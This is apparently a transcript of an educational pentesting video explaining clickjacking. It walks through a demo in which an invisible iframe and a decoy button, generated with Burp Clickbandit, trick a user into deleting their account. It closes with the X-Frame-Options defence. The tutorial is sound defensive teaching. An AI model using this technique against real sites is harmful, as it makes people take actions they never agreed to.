17-04-2019 / From 0 to pentesting hero

Clickjacking

How to convince the user to delete his account on the website without his consent?

My name is Kacper Szurek and in today's episode of "from 0 to pentesting hero" we'll talk about Clickjacking? attack.

Delete account

To be compliant with current law, most websites must provide the functionality of removing the account.

In today's video, we'll use an example that simulates this operation.

We have a text box with a random value generated by the server at the time of form creation.

After pressing the Delete account button, this value is validated by the server.

If the value matches the previously generated key - the account is deleted.

Otherwise, we get an error message.

Delete account form

Thanks to this, an outsider is not able to prepare a phishing e-mail for account removal with a valid token

and then make us click it. He does not know the correct value. In that you can protect yourself against CSRF attacks where the user unknowingly performs a request prepared by someone with hostile intentions.

However today we are talking about another method of attack - that is Clickjacking.

HTML allows for embedding external sites inside our site.

This can be done using the iframe1 tag.

IFRAME tag

In the src parameter, we provide the address and that's it.

Our website has external content.

We can freely modify the size of the embedded frame and change its position relatively to our site.

We can also make it invisible to the user. And the combination of these elements is what we are going to use.

It's best to demonstrate it by example. For this purpose, I'll use the Clickbandit script from the Burp Suite tool.

Burp Clickbandit

From the application menu, I select the proper option and copy the content of the script.

Now, on the page that I want to attack, I open the development console and paste the contents of the clipboard.

In this way, I launched a software that helps in carrying out Cickjacking attacks.

Then I click start. Now I can select places to be clicked by un unaware victim.

In our case, this is the Delete account button. There can be many places like this - for our purpose we only need one.

At the end I click the Finish button.

Create clickjacking attack

As you can see, the script now has a red button with the word Click.

It is flawlessly positioned in such way - so that it lies directly on the Delete account button.

What is going on? Let's turn off the transparency and save the generated code.

Clickjacking attack in practice

We saw a white page with one red button encouraging you to click.

There is no sign of an external service - the fact that you can not see it does not mean that it is not present on a given page.

We can proof this by browsing the development tools options - the external page is loaded by Chrome.

Chrome devtool console

Let's see what happens when you press the button.

We received a message that we were attacked.

In addition, a correct form has been sent to the server with a valid token which will make our account deleted.

If we turn off the transparency, we will see how the attack works in practice.

Attack in demo mode

On the page, we've displayed the content of an external site using the iframe tag.

We made the window content invisible to the user with some CSS.

In addition, we displayed a colored rectangle in place of the button.

Therefore, the user thinks that he clicks the rectangle on our website - he is not able to see the button on the external page because of CSS.

However, he clicks the button located in iframe.

The probability of this attack depends on our creativity.

We have to convince the user to click the button. There are many ways - for example, creating a fake survey.

Informations about attack

But why the CSRF protection didn't work? How the attacker did know the value of the random token?

The answer is simple. He did not need to know it. We didn't create a fake account to delete it but we used the real one, which was used on the website.

All with the iframe tag.

How to protect yourself against this attack?

It's enough to add a special header on our site:

header("X-Frame-Options: DENY");

When browser finds such header it will not allow for displaying our page using iframe.

When we try to perform our attack once again, this time in the browser console we'll see information that our site was not displayed due to the x-frame-options header.

Error information

In the past, such attacks were used to steal likes on Facebook and other sites. The attackers included a Facebook2. page on their own website and set up buttons in such places to make the user like a fanpage.

Facebook

And that's all in today's episode. As you can see innocent clicks on the website can have significant consequences.